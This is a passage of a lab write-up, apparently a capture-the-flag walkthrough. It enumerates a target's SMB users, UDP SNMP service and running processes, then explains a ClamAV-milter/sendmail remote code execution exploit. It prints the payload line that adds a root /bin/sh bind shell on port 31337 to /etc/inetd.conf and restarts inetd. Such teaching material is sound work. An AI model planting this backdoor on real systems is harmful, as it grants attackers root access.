The list of users discovered can be seen below (I did try the decoded string from earlier as the password for these users on SSH, but I did not have any success):

• root
• daemon
• bin
• sys
• sync
• games
• man
• lp
• mail
• news
• uucp
• proxy
• www-data
• backup
• list
• irc
• gnats
• Debian-exim
• ryu
• nobody

After this SMB enumeration hit a dead end so I decided to move on. Looking back over our Nmap results i did notice something interesting.

199/tcp   open  smux        syn-ack ttl 61 Linux SNMP multiplexer

SNMP multiplexer. From previous experience I know that SNMP usually runs over UDP and not TCP. As our original Nmap scan was a TCP scan, it would not have detected this service if it was open. I then ran another Nmap scan of the top 100 UDP ports.

└─$ sudo nmap -sU <Target IP> --top-ports 100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-01 13:18 BST
Nmap scan report for 192.168.114.42
Host is up (0.014s latency).
Not shown: 57 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
PORT    STATE SERVICE
137/udp open  netbios-ns
161/udp open  snmp <-------

Okay, here we can see that SNMP is open and running on port 161 over UDP protocol. Lets enumerate this service further to see if we can discover some information which could help us.

I decided to first use Nmap scripts to enumerate SNMP as its a quick and easy way to get information. Using the -sC option with nmap uses all of Nmaps default scripts against the target, which covers some of the scripts for SNMP. Below is the output from this scan. I have cropped some parts of the output for clarity as there was a lot of information.

└─$ sudo nmap -sU <Target IP> -p 161 -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-01 13:28 BST
Nmap scan report for 192.168.114.42
Host is up (0.013s latency).

PORT STATE SERVICE
161/udp open snmp
| snmp-processes:

-------# CROPPED HERE

| 3781: 
| Name: clamav-milter
| Path: /usr/local/sbin/clamav-milter
| Params: --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl

-------# CROPPED HERE

| 3885: 
| Name: sendmail-mta
| Path: sendmail: MTA: accepting connections

-------# CROPPED HERE

The scan discovered two interesting processes running, “clamav-milter” and “sendmail-mta”. When giving these two processes a google, an exploit is discovered which grants the attacker Remote Code Execution. Thats exactly what we want. Exploit here

It took me a while to figure out exactly what this exploit was doing. Lets break the exploit down a bit to get a better understanding:

echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf

This line of code forces open port 31337 on the target machine, and then says any connection which is made to that port, open a shell as the root user. It then puts this line of code into the /etc/inetd.conf file. Well what is that file ?

This file specifies which network services inetd should listen for and the programs to run when a connection is made to those services.

/etc/init.d/inetd restart

This line of code restarts the inetd deamon to apply the changes we just made.

So to summarise, once we run this exploit, port 31337 will be forced open on the target, and if we connect to that port, we should get a root shell. Below is an example of the exploit being run successfully.